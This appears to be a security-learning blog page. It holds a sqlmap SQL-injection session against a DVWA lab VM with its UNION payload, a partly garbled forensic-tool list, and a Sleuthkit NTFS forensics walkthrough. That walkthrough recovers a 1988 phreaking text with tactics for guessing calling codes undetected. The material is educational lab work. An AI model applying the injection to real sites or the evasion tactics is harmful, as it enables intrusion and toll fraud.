root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ee66c40d056596d8e02129bd8ab3f095" -D tikiwiki -T tiki_pages -C user --dump

sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool

http://www.sqlmap.org

[*] starting at 05:01:23

[05:01:23] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file

[05:01:23] [INFO] resuming injection data from session file

[05:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file

[05:01:23] [INFO] testing connection to the target url

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: id

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause

Type: UNION query

Title: MySQL UNION query (NULL) - 2 columns

Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit

---

[05:01:23] [INFO] the back-end DBMS is MySQL

web server operating system: Linux Ubuntu 8.04 (Hardy Heron)

web application technology: PHP 5.2.4, Apache 2.2.8

back-end DBMS: MySQL 5.0

do you want sqlmap to consider provided column(s):

[1] as LIKE column names (default)

[2] as exact column names

> 1

[05:01:27] [INFO] fetching columns LIKE 'user' for table 'tiki_pages' on database 'tikiwiki'

[05:01:27] [INFO] fetching entries of column(s) 'user' for table 'tiki_pages' on database 'tikiwiki'

[05:01:27] [INFO] analyzing table dump for possible password hashes

Database: tikiwiki

Table: tiki_pages

[1 entry]

+-------+

| user |

+-------+

| admin |

+-------+

[05:01:27] [INFO] Table 'tikiwiki.tiki_pages' dumped to CSV file '/pentest/database/sqlmap/output/192.168.56.101/dump/tikiwiki/tiki_pages.csv'

[05:01:27] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 05:01:27

Friday, November 9, 2012

Install chrome simple

How to install chrome is very simple, just follow the following :

root@bt:~# apt-get install chromium-browser
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0

root@bt:~# apt-get install chromium-browser
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0
The following NEW packages will be installed:
chromium-browser chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0

root@bt:~# apt-get install chromium-browser
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0
The following NEW packages will be installed:
chromium-browser chromium-browser-inspector chromium-browser-l10n chromium-codecs-ffmpeg libvpx0

root@bt:~# cd /usr/lib/chromium-browser
root@bt:/usr/lib/chromium-browser# ls
chrome.pak        chromium-browser-sandbox libppGoogleNaClPluginChrome.so plugins    resources.pak xdg-settings
chromium-browser libffmpegsumo.so          locales                         resources xdg-mime

root@bt:/usr/lib/chromium-browser# hexedit chromium-browser
root@bt:/usr/lib/chromium-browser# tar -zxvf /root/Desktop/
.directory                                 install_flash_player_11_linux_i386.tar.gz

root@bt:/usr/lib/chromium-browser# tar -zxvf /root/Desktop/install_flash_player_11_linux_i386.tar.gz
libflashplayer.so
readme.txt
usr/
usr/bin/
usr/bin/flash-player-properties
usr/share/
usr/share/kde4/
usr/share/kde4/services/
usr/share/kde4/services/kcm_adobe_flash_player.desktop
usr/share/applications/

root@bt:/usr/lib/chromium-browser# cp libflashplayer.so /usr/lib/chromium-browser/plugins/
root@bt:/usr/lib/chromium-browser# launch chrome

Thursday, November 1, 2012

Tools in Forensic

1. Antiword

Antiword is an application used to display text and a picture of a Microsoft Word document. Antiword only supports documents created by MS Word version 2 and version 6 or newer.

2. Autopsy

The Autopsy Forensic Browser is a graphical interface for investigative analysis tool command line diginal The Sleuth Kit. Together, they can analyze the disks and Windows and UNIX filesystems (NTFS, FAT, Ext2, UFS1/2/3).

3. Binhash

Binhash is a simple program to perform the hashing of the various sections of the files ELF and PE for comparison. Currently she performs a hash on the segment header from the header segment of an object segment header parts elves and obyekPE.

4. Sigtool

Sigtcol is a tool for the management of database and ClamAV signatures. sigtool can be used to rnenghasilkan the MD5 checksum, data conversion into hexadecimal format, display a list of virus signatures and build/unpack/test/verify a database update script and CVD.

5. ChaosReader

ChaosReader is a freeware tool to track the session TCP/UDP/... and pick up application data from log tcpdump. la would take a telnet session, file transfer FTP, HTTP (HTML, GIF, JPEG, ...), email SMTP, and so on, from the data captured by a log of network traffic. An html index file will be created containing a link to the rest of the session details, including the program replay realtime for a telnet session, rlogin, IRC, or X 11 VNC; and create reports such as the report image and report the contents of the HTTP GET/POST.data

6. Chkrootkit

Chkrootkit is a tool to check for signs of a rootkit. la will examine the main whether utilities are infected, and is currently examining approximately 60 rootkit and its variations.

7. dcfldd

This Tool was originally developed at the Department of Defense Computer Forensics Lab (DCFL). Although Nick Harbour is no longer affiliated with the DCFL he maintains this tool.

8. ddrescue

GNU ddrescue is a data recovery tool, la menyalinkan data from one file or block device (hard disc, cdrom, etc) to another, trying hard to save data in case of failure of the reading. Ddrescue does not truncate the output file if not asked. So each time you run it kefile the same output, he attempted to fill the void.

9. the foremost

Foremost is a tool that can be used to recover files based on the header, footer, or data structure of the file. la was initially developed by Jesse Kornblum and Kris Kendall of the United States Air Force Office of Special Investigations and The Center for Information Systems Security Studies and Research. Foremost is currently maintained by Nick Mikus a researcher at the Naval Postgraduate School Center for Information Systems Security Studies and Research.

10. Gqview

Gqview is an image viewing program for GTK la supports image formats, zooming, panning, thumbnails, and sorting of images.

11. Galleta

Galleta is a tool written by Keith j. Jones to perform forensic analysis of cookies Internet Explorer.

12. Ishw

Ishw (Hardware Lister) is a small tool that provides detailed information about the configuration of the hardware in the machine. la may report memory configuration, firmware version, mainboard configuration, version and CPU speed, bus speed, cache configuration, etc. on the system of t > MI-capable x 86 or EFI System.

13. pasco

A lot of computer crime investigations require reconstruction of the Internet activities of the suspects. Because this analysis technique is done regularly, Keith investigates the structure of the data found in the activity file Internet Explorer (index.dat files). Pasco, which comes from Latin and means "browse", was developed to test the contents of the Internet Explorer cache files. Pasco will check the information in the index.dat files and issue results in delimited fields so it can be imported into your favorite spreadsheet program.

14. the Scalpel

Scalpel is a forensic tool that is designed to identify, isolate and recover data from media computer forensic investigations throughout the process. Scalpel seeks hard drive, bit-stream image, unallocated file space, or any computer files for characteristics, content or a particular attribute, and generates reports on the location and content of the artifacts that were found during the search process. Scalpel also produce (carves) artifacts that are found as individual files.

Forensic Analysis,NTFS Examination: ADS,NTFS Examination: Sorting Files,Signature Search in Unallocated Space.

File System Forensic Analysis :

Let's create a directory in our /root (the root user's home) directory
called /root/ntfs_pract/ and place the file in there. First, we will decompress the
gzipped file using the gzip command we learned earlier and check its SHA1
hash:
root@bt:~# cd /root/forensic/
root@bt:~/forensic# ls
ntfs_pract.dd

root@bt:~/forensic# sha1sum ntfs_pract.dd
0cbce7666c8db70377cb5fc2abf9268821b6dafe ntfs_pract.dd

Now we will run through a series of basic Sleuthkit commands as we
would in any analysis. The structure of the forensic image is viewed using
mmls:

root@bt:~/forensic# mmls ntfs_pract.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00: Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01: -----   0000000000   0000000058   0000000059   Unallocated
02: 00:00   0000000059   0001023059   0001023001   NTFS (0x07)
03: -----   0001023060   0001023999   0000000940   Unallocated

The output shows that an NTFS partition (and most likely the file
system) begins at sector offset 59. This is the offset we will use in all our
Sleuthkit commands. We now use fsstat to have a look at the file system
statistics inside that partition:

root@bt:~/forensic# fsstat -o 59 -f ntfs ntfs_pract.dd
FILE SYSTEM INFORMATION
--------------------------------------------
File System Type: NTFS
Volume Serial Number: E4D06402D063D8F6
OEM Name: NTFS
Volume Name: NEW VOLUME
Version: Windows XP

METADATA INFORMATION
--------------------------------------------
First Cluster of MFT: 42625
First Cluster of MFT Mirror: 63937
Size of MFT Entries: 1024 bytes
Size of Index Records: 4096 bytes
Range: 0 - 144
Root Directory: 5

CONTENT INFORMATION
--------------------------------------------
Sector Size: 512
Cluster Size: 4096
Total Cluster Range: 0 - 127874
Total Sector Range: 0 - 1022999

Looking at the fsstat output on our NTFS file system, we see it differs
greatly from the output we saw running on a Linux EXT file system. The tool is
designed to provide pertinent information based on the file system being
targeted. Notice that when run on an NTFS file system, fsstat provides us with
information specific to NTFS, including data about the Master File Table (MFT)
and specific attribute values.
We will now have a look at how the Sleuthkit interacts with active and
deleted files on an NTFS file system, given the structure of MFT entries.
Let's begin this exercise with the output of fls. We can specify that fls
only show us only “deleted” content on the command line with the d
option.
We will use F
(only file entries) and r
(recursive) as well:

root@bt:~/forensic# fls -Frd -o 59 ntfs_pract.dd
r/r * 42-128-1: Cookies/buckyball@revsci[2].txt
r/r * 43-128-1: Cookies/buckyball@search.msn[1].txt
r/r * 44-128-1: Cookies/buckyball@slashdot[1].txt
r/r * 45-128-1: Cookies/buckyball@sony.aol[2].txt
-/r * 112-128-4:        My Documents/My Pictures/bandit-streetortrack2005056.jpg
-/r * 116-128-4:        My Documents/My Pictures/fighterama2005-ban4.jpg
-/r * 81-128-4: My Documents/direct_attacks.doc

As of Sleuthkit version 3, the output of fls now shows content that
includes NTFS “orphan” files.20 Previous versions required the user to run an
additional command, ifind, on parent directories in order to recover orphan
files. The article in the footnote explains how this works.
The output above shows that our NTFS example file system holds 7
deleted files. Let's have a closer look at some NTFS specific information that
can be parsed with the Sleuthkit.
Have a look a the deleted file at MFT entry 112. The file is ./ My
Documents/My Pictures/banditstreetortrack2005056.
jpg . We can have a closer
look at the file's attributes by examining its MFT entry directly. We do this
through the istat tool. Recall that when we were working on an EXT file system
previously, the output of istat gave us information directly from the inode of
the specified file (see Sleuthkit Exercise #1). As we mentioned earlier, the
output of the Sleuthkit tools is specific to the file system being examined. So
let's run the command on MFT entry 112 in our current exercise:

root@bt:~/forensic# istat -o 59 ntfs_pract.dd 112
MFT Entry Header Values:
Entry: 112        Sequence: 2
$LogFile Sequence Number: 4201668
Not Allocated File
Links: 2

$STANDARD_INFORMATION Attribute Values:
Flags: Archive
Owner ID: 0
Security ID: 259 ()
Created:        Sat Apr 7 11:52:53 2007
File Modified: Sat Oct 14 21:37:13 2006
MFT Modified:   Sat Apr 7 11:52:53 2007
Accessed:       Sun Apr 8 07:00:04 2007

Attributes:
Type: $STANDARD_INFORMATION (16-0)   Name: N/A   Resident   size: 72
Type: $FILE_NAME (48-3)   Name: N/A   Resident   size: 90
Type: $FILE_NAME (48-2)   Name: N/A   Resident   size: 128
Type: $DATA (128-4)   Name: N/A   Non-Resident   size: 112063 init_size: 112063
60533 60534 60535 60536 60537 60538 60539 60540
60541 60542 60543 60544 60545 60546 60547 60548
60549 60550 60551 60552 60553 60554 60555 60556
60557 60558 60559 60560

The information istat provides us from the MFT shows values directly
from the $STANDARD_INFORMATION attribute (which contains the basic
meta data for a file), the $FILE_NAME attribute and basic information for other
attributes that are part of an MFT entry. The data blocks that contain the
actual file content are listed at the bottom of the output (for NonResident
data).
Take note of the fact that there are two separate attribute identifiers for
the $FILE_NAME attribute, 483
and 482.
It is interesting to note we can
access the contents of each attribute separately using the icat command.
The two attributes store the DOS (8.3) filename and the Win32 (long) file
name. By piping the output of icat to xxd we can see the difference. By itself,
this may not be of much investigative interest, but again we are illustrating the
capabilities of the Sleuthkit tools.
Note the difference in output between the attribute identifiers 112-48-3
and 112-48-2:

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112-48-3 | xxd
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701 n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701 0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000 0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
0000040: 0c02 4200 4100 4e00 4400 4900 5400 7e00 ..B.A.N.D.I.T.~.
0000050: 3100 2e00 4a00 5000 4700                 1...J.P.G.

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112-48-2 | xxd
0000000: 6e00 0000 0000 0100 3071 be99 d078 c701 n.......0q...x..
0000010: 3071 be99 d078 c701 3071 be99 d078 c701 0q...x..0q...x..
0000020: 3071 be99 d078 c701 0000 0000 0000 0000 0q...x..........
0000030: 0000 0000 0000 0000 2000 0000 0000 0000 ........ .......
0000040: 1f01 6200 6100 6e00 6400 6900 7400 2d00 ..b.a.n.d.i.t.-.
0000050: 7300 7400 7200 6500 6500 7400 6f00 7200 s.t.r.e.e.t.o.r.
0000060: 7400 7200 6100 6300 6b00 3200 3000 3000 t.r.a.c.k.2.0.0.
0000070: 3500 3000 3500 3600 2e00 6a00 7000 6700 5.0.5.6...j.p.g.

The same idea is extended to other attributes of a file, most notably the
“Alternate Data Streams” or ADS. By showing us the existence of multiple
attribute identifiers for a given file, the Sleuthkit gives us a way of detecting
potentially hidden data. We cover this in our next exercise.

NTFS Examination: ADS

First, to see what we are discussing here, in case the reader is not
familiar with alternate data streams, we should compare the output of a normal
file listing with that obtained through a forensic utility.
Obviously, when examining a system, it may be useful to get a look at all
of the files contained in an image. We can do this two ways. The first way
would be to simply mount our image with the loop back device and get a file
listing. We will do this to compare a method using standard command line
utilities that we used in the past with a method using the Sleuthkit tools.
Remember that the mount command works on file systems, not disks.
The file system in this image starts 59 sectors into the image, so we mount
using an offset. We can then obtain a simple list of files using the find
command:

root@bt:~/forensic# mount -t ntfs -o ro,loop,offset=30208 ntfs_pract.dd /mnt/analysis/
root@bt:~/forensic# cd /mnt/analysis/
root@bt:/mnt/analysis# find . -type f
./Cookies/buckyball@ad.yieldmanager[1].txt
./Cookies/buckyball@adopt.specificclick[2].txt
./Cookies/buckyball@ads.as4x.tmcs[1].txt
./Cookies/index.dat
./Desktop/dtrsetup.exe
./Favorites/MSN.com.url
./Favorites/StreetFighter Accessories - StreetFighter and Sportbike accessories. One stop shopping for StreetFighters.url
./Favorites/Two Brothers Racing.url
./My Documents/amstra~1
./My Documents/My Pictures/b45ac806a965017dd71e3382581c47f3_refined.jpg
./My Documents/My Pictures/bankor1.jpg
./NTUSER.DAT
./SVstunts.avi

root@bt:/mnt/analysis# file /mnt/analysis/SVstunts.avi
/mnt/analysis/SVstunts.avi: RIFF (little-endian) data, AVI, 160 x 120, 15.00 fps, video: Cinepak

root@bt:/mnt/analysis# cd
root@bt:~# cd /root/forensic/
root@bt:~/forensic# file /m
media/ mnt/

root@bt:~/forensic# file /mnt/analysis/SVstunts.avi
/mnt/analysis/SVstunts.avi: RIFF (little-endian) data, AVI, 160 x 120, 15.00 fps, video: Cinepak

root@bt:~/forensic# fls -Fr -o 59 -f ntfs_pract.dd
Unsupported file system type: ntfs_pract.dd
usage: fls [-adDFlpruvV] [-f fstype] [-i imgtype] [-b dev_sector_size] [-m dir/] [-o imgoffset] [-z ZONE] [-s seconds] image [images] [inode]
        If [inode] is not given, the root directory is used
        -a: Display "." and ".." entries
        -d: Display deleted entries only
        -D: Display only directories
        -F: Display only files
        -l: Display long version (like ls -l)
        -i imgtype: Format of image file (use '-i list' for supported types)
        -b dev_sector_size: The size (in bytes) of the device sectors
        -f fstype: File system type (use '-f list' for supported types)
        -m: Display output in mactime input format with
              dir/ as the actual mount point of the image
        -o imgoffset: Offset into image file (in sectors)
        -p: Display full path for each file
        -r: Recurse on directory entries
        -u: Display undeleted entries only
        -v: verbose output to stderr
        -V: Print version
        -z: Time zone of original machine (i.e. EST5EDT or GMT) (only useful with -l)
        -s seconds: Time skew of original machine (in seconds) (only useful with -l & -m)

Now let's try another method of obtaining a file list. Since this is a
forensic examination, let's use a forensic tool to give us a list of files. We will
use the fls command with the -F option to show only files, and the -r
option to recurse through directories (starting from the root directory, by default). The “...” signifies removed output for brevity :

root@bt:~/forensic# fls -Fr -o 59 -f ntfs ntfs_pract.dd
r/r 4-128-4:    $AttrDef
r/r 1-128-1:    $MFTMirr
r/r 9-128-8:    $Secure:$SDS
r/r 9-144-11:   $Secure:$SDH
r/r 9-144-5:    $Secure:$SII
r/r 10-128-1:   $UpCase
r/r 3-128-3:    $Volume
r/r 36-128-1:   Cookies/buckyball@as-eu.falkag[2].txt
r/r 30-128-1:   Cookies/buckyball@2o7[1].txt
r/r 31-128-1:   Cookies/buckyball@ad.yieldmanager[1].txt
r/r 32-128-4:   Cookies/buckyball@adopt.specificclick[2].txt
r/r 28-128-3:   Desktop/dtrsetup.exe
r/r 74-128-4:   My Documents/anon-mail.txt

Both entries have the same MFT record number and are identified as file
data (137128) but the attribute identifier increments by one (1371283
and 1371284) 22. This is an example of an “Alternate Data Stream” (ADS).
Accessing the standard contents (1371283)
of SVstunts.avi is easy, since it is
an allocated file. However, we can access either data stream, the normal data or the ADS, by using the Sleuthkit command icat, much as we did with the two file name types in our previous exercise. We simply call icat with the complete MFT record entry, to include the alternate attribute identifier. To view the contents of the ADS (1371284):

root@bt:~/forensic# icat -o 59 -f ntfs ntfs_pract.dd 137-128-4

   <()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>
   /||                                                                    ||\
   \||                   P R O F E S S O R   F A L K E N ' S              ||/
   /||                                                                    ||\
   \||                               GUIDE TO                             ||/
   /||                                                                    ||\
   \||                      ***** ***** ****   *****                    ||/
   /||                      *   * *   * *   * *                        ||\
   \||                      *      *   * *   * *****                    ||/
   /||                      *   * *   * *   * *                        ||\
   \||                      ***** ***** ****   *****                    ||/
   /||                                            P {                    ||\
   \||                                                                    ||/
   /||                           HACKING SECURITY                        ||\
   \||                                                             (C)1988||/
   <()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>-<()>

   First I'd like to thank the following people for thier contributions to this
file and to my knowledge about this fucking world--=-> Frye Guy, Laser,
David Lightman, HackerSoft in it's entirety, The Rebel, Digital Logic,
L.E. Pirate, Brain Tumor, Boris Crack, Mad Max, Sike III, The Blade,
Spartacus, Baby Eagle, Iceman/TOPGUN, Spam Master, & Codebuster.

   This file is meant for the beginner/novice/amateur code hacker. Anyone
have been hacking for over 2 years you probably don't need to read.

   The first thing I would like to point out is the major LD companies security
systems. A couple years ago MCI and SPRINT installed a NEW type of ESS
which makes it easier to catch code hacks. This system is able to detect
patterns on it's ports, such as one target number being repeated many times or
invalid codes repeating every x number of minutes. They thought they were
smart, but we just have to be a step smarter.

MULTIPLE PORTS-->
   By having a code hacker that uses multiple port hacking ( that is one that
can hack many ports in one session ) you can lower the odds of being caught
tremendously. By entering many ports into the hackers database and being able
to access them all in one session reduces the LD Co's ability to catch a
pattern on one of their port/s. With this feature you are able to throw the LD
company off WHERE and WHEN you will strike next. ALSO SEE TIMING PATTERNS.

MULTIPLE TARGETS-->
   The first of the (IBM) programs to have multiple targets was Terminus's
Codebuster, it was then implemented into The Brew Associate's Code Thief. By
utilizing a program's multiple target option, the chances you being caught by
their system's pattern detection is almost NIL. Code Thief's multiple target
file contains 369 targets. If you cannot get this target list I suggest you
compile a list of TELENET,COMPUSERVE, etc. dial ups and use them for targets.
At least you'll have a better chance...

PORT PATTERNS & TIMING PATTERNS-->
   Long distance companies like SPRINT/MCI usually have more than 1 port in
large cities/areacodes, thus you can hack on many of their ports. Increasing
the number of ports you hack on gives you an edge. The LD's system will get
suspicious if it finds many invalid codes attempts on one of its port. Each
port is allotted a certain amount of invalid codes attempts. If this number is
exceeded an error flag will go on and the security division will be alerted to
the port. So in other words by increasing the ports you can decrease your odds
of being alerted to and ANI'ed.

   As mentioned before the LD companies also have timing pattern recognition.
This means they can tell if they are getting an invalid code attempt every
x minutes. This really is the most deadly features of their system ( next to
ANI of course ) because almost every hacker I know of runs on a set amount of
time for each thing to happen. Carrier timeout,seconds to wait till code &
target are entered, all of these are on a fixed amount of time. Every so many
number of seconds the hacker repeats its invalid code timeout & retry time
almost exactly. To get rid of this deadly feature is QUITE simple.
What I suggest is to add another port or two to your list. However, this port
is special because its not a port at all. It's a friend you hate or a
disconnected number or some business. That way your timing for the LD's ports
will not stay predictable. Also vary the carrier timeout value ( a.k.a.
timeout value ) for the fake port numbers. Doing this will make you about as
unpredictable as nitroglycerine made from a T-File.

TIMES TO HACK-->
   When I first started code hacking 84' I thought the best time to hack was
at 2 a.m. because there wouldn't be anybody at the L.D. company then. Well
maybe back then there wasn't because there wasn't any customer service after
6pm. But the times have changed. There is security and customer service and
maintenance there 24 hours a day 7 days a week- Even Holidays. So the best
time to hack would be when normal customers are using it. Most customers are
either business's or households. So your best bet would be hacking when they
would use it- M-F 8am to 7pm. This is when most people accidently fuck-up on
their code and thus it is the best time to hack. I would suggest hacking in
the morning since the LD's system is counting the number of invalid attempts
if you do a lot in the morning then the subscribers in the afternoon will get
get evil eye, not you. Usually the LD companies system RESETS its value at
12:00 midnight so that the invalid attempt numbers don't keep adding on the
the previous days. Also hacking on holidays such as Christmas is excellent
because the amount of people calling everyone all over the fucking place is
magnanimous.

IBM HACK PROGRAMS-->
   I have an IBM and I use Code Thief Version 2.2 which can be found on almost
any good phreak/pirate BBS around. Most of the code hacker's I have run into
either didn't work on my system because 1> The programmer didn't BETA test the
program totally. 2> The programmer didn't know what the fuck he was doing.
3> The program had so little features that you're bound to be caught using it.
The best program I've found was Code Thief Version 2.2 I have looked over:
Fuckin Hacker 2.0- It didn't work properly on IBM PC (Possibly fucked ARC)
All-In-One Hacker- Not enough features/Parts of program fucked up.
Codebuster- Couldn't get it to work with my modem ( HAYES 1200B )
AutoHack- Not enough features.

NEW PRODUCTS-->
Be on the look out for INTEL-Hack. This hacker is somewhat secret right now,
but I'll tell you it will have all the features of Code Thief but it will take
advantage of the 80386's multitasking capabilities. Lookout it should be
killer, release date: Not yet planned, 89' sometime.
Later, and I hope this shed some insight on how to keep yourself safe...- Professor Falken

root@bt:~/forensic# mkdir sort_out
root@bt:~/forensic# sorter -d ./sort_out -md5 -h -s -o 59 -f ntfs ntfs_pract.dd

Analyzing "ntfs_pract.dd"
Loading Allocated File Listing
Processing 133 Allocated Files and Directories
100%
All files have been saved to: ./sort_out

root@bt:~/forensic# ls sort_out/
archive       audio.html disk       documents.html images       mismatch.html text
archive.html data        disk.html exec            images.html system         text.html
audio         data.html   documents exec.html       index.html   system.html    unknown.html

Look in the file :

Signature Search in Unallocated Space

Now let's do the same sort of unallocated analysis we did in Exercise #3,
but this time instead of searching for text data, we will look for file signatures.
This will give us an opportunity to introduce another useful Sleuthkit tool,
sigfind.
For this particular exercise, we'll use the NTFS image we used
previously, ntfs_pract.dd. Change to the directory containing that image and
let's begin.
As always, we start with mmls to help us identify the offset of the file
system within the image that we are interested in :

root@bt:~# cd /root/forensic/
root@bt:~/forensic# ls
evid ntfs_pract.dd Rby sort_out

root@bt:~/forensic# mmls ntfs_pract.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00: Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01: -----   0000000000   0000000058   0000000059   Unallocated
02: 00:00   0000000059   0001023059   0001023001   NTFS (0x07)
03: -----   0001023060   0001023999   0000000940   Unallocated

Here we want to study the unallocated data from the NTFS file system at
sector offset 59. So we issue our blkls command and redirect the output to
another file:

root@bt:~/forensic# blk
blkcalc blkcat   blkid    blkls    blkstat

root@bt:~/forensic# blkls -o 59 ntfs_pract.dd > ntfs_pract.blkls
root@bt:~/forensic# ls -lh
total 978M
drwxr-xr-x 2 root root 4.0K 2012-10-31 00:07 evid
-rw-r--r-- 1 root root 478M 2012-11-01 23:52 ntfs_pract.blkls
-rwxr-xr-x 1 root root 500M 2007-10-23 01:28 ntfs_pract.dd
drwxr-xr-x 2 root root 4.0K 2012-10-31 17:16 Rby
drwxr-xr-x 11 root root 4.0K 2012-11-01 21:39 sort_out

Once again, the output file is arbitrarily named. I give it a .blkls
extension for the sake of simplicity. Now, let's go ahead and search the
unallocated image we created for JPEG images. We use these JPEG picture files
for our example because most experienced forensic examiners are familiar with
the signatures.
For example, the man page for sigfind gives the example of searching for
a boot sector signature with the command:

root@bt:~/forensic# sigfind -o 510 -l AA55 ntfs_pract.dd
Block size: 512 Offset: 510 Signature: 55AA
Block: 0 (-)
Block: 59 (+59)
Block: 492076 (+492017)
Block: 1023059 (+530983)
error reading bytes 1024000
In this case, the block size is the default 512 (no -b
option is given). The -o 510 tells sigfind to look for the signature 510 bytes into every sector it searches.

The loption refers to the endian ordering of the signature.
Back to our exercise at hand...We must also keep in mind that sigfind
takes hex as it's signature string, so unlike grep, we cannot simply search for
“JFIF”. We need to convert the ASCII string to hex. This is easily done by
echoing the string to xxd with the p
option (continuous or “plain” dump):

root@bt:~/forensic# echo -n JFIF | xxd -p
4a464946
Also note in the above command, we use the n
option to echo to
prevent a newline character from being passed to xxd as well. The hex
signature we are going to search for is 4A464946 (“JFIF”).
We can now do our sigfind command.

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.dd
Block size: 4096 Offset: 6 Signature: 4A464946
error reading bytes 128000

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.blkls
Block size: 4096 Offset: 6 Signature: 4A464946
Block: 57539 (-)
Block: 57582 (+43)
error reading bytes 122238
The command above sows us running sigfind with a block size (-b)
of 4096 (from fsstat output), an offset (-o)
of 6, and a signature of 4A464946 on the extracted unallocated space ntfs_pract.blkls.
As you can see, we come up with two hits. Now we use the blkcalc
command to determine the block address of the unallocated block in the
original image:

root@bt:~/forensic# blkcalc -o 59 -u 57539 ntfs_pract.dd
60533
Above, we called blkcalc with u
57539 to indicate that we are passing an address from an unallocated image provided by blkls. The file system this unallocated block was extracted from is in our ntfs_pract.dd image at sector offset 59. The result shows us that unallocated block 57539 in our blkls image maps to data block 60533 in the original file system.
Now that we have the data block (60533) in the original file system, we
can use ifind to identify the meta data structure that is assigned to that data
block. In this case the meta data structure is an MFT entry, since we are
working with an NTFS file system:

root@bt:~/forensic# ifind -o 59 -d 60533 ntfs_pract.dd
112-128-4
The MFT entry is 1121284 or simply 112 (The 1284 portion denotes
the $DATA attribute identifier). We can use ffind to determine the file name
that holds (or held) that particular MFT entry. Be very careful of interpretation here. As always, you need to have a firm grip on how the file system works before deciding that the information being presented is accurate, depending on the file system being examined.

root@bt:~/forensic# ffind -o 59 ntfs_pract.dd 112
* /My Documents/My Pictures/bandit-streetortrack2005056.jpg
Recovering the deleted file using icat and piping the results to the file
command indicates that we have found a JPEG image, which the previous ffind command indicated may have been called banditstreetortrack2005056.
jpg.

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112 | file-
No command 'file-' found, did you mean:
Command 'file2' from package 'file-kanji' (universe)
Command 'filep' from package 'mp' (universe)
Command 'file' from package 'file' (main)
file-: command not found

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 112 | file -
/dev/stdin: JPEG image data, JFIF standard 1.02
Recall now our original sigfind output:

root@bt:~/forensic# sigfind -b 4096 -o 6 4A464946 ntfs_pract.blkls
Block size: 4096 Offset: 6 Signature: 4A464946
Block: 57539 (-)
Block: 57582 (+43)

root@bt:~/forensic# blkcalc -u 57582 -o 59 ntfs_pract.dd
60662
root@bt:~/forensic# ifind -o 59 -d 60662 ntfs_pract.dd
116-128-4

root@bt:~/forensic# ffind -o 59 ntfs_pract.dd 116
* /My Documents/My Pictures/fighterama2005-ban4.jpg

root@bt:~/forensic# icat -o 59 ntfs_pract.dd 116 | file -
/dev/stdin: JPEG image data, JFIF standard 1.01
We have another JPEG, this one at MFT entry 116, and named
fighterama2005ban4.jpg.

We can actually recover both files by using icat and redirecting to new
files. I've named the files by their MFT entry and the .jpg extension, since the file command confirmed that's what they are :

root@bt:~/forensic# icat -o ntfs_pract.dd 112 > 112.jpg
Invalid image offset (tsk_parse: invalid image offset: ntfs_pract.dd)

root@bt:~/forensic# icat -o ntfs_pract.dd 116 > 116.jpg
Invalid image offset (tsk_parse: invalid image offset: ntfs_pract.dd)

You can now view the files with any graphics viewer you might have
available. For example, you can use the display command

root@bt:~/forensic# display 112.jpg
display: Empty input file `112.jpg' @ jpeg.c/EmitMessage/232.

Learning Infomation Security

Saturday, March 22, 2014

METASPLOIT DVWA GNU LINUX IN VIRTUALBOX

Friday, November 9, 2012

Install chrome simple

Thursday, November 1, 2012

Tools in Forensic

Forensic Analysis,NTFS Examination: ADS,NTFS Examination: Sorting Files,Signature Search in Unallocated Space.

Halloween

SCX020C077

Blog Archive